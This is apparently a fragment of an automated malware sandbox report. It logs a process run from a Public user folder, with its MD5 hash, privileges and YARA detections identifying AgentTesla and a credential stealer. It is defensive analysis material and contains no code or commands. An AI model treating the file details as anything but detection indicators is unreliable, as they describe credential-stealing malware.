                                                                                                                                        File size:518656 bytes
                                                                                                                                        MD5 hash:B7679C443E22238291F5603F016FF56E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:12:03:21
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Imagebase:0x510000
                                                                                                                                        File size:518656 bytes
                                                                                                                                        MD5 hash:B7679C443E22238291F5603F016FF56E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >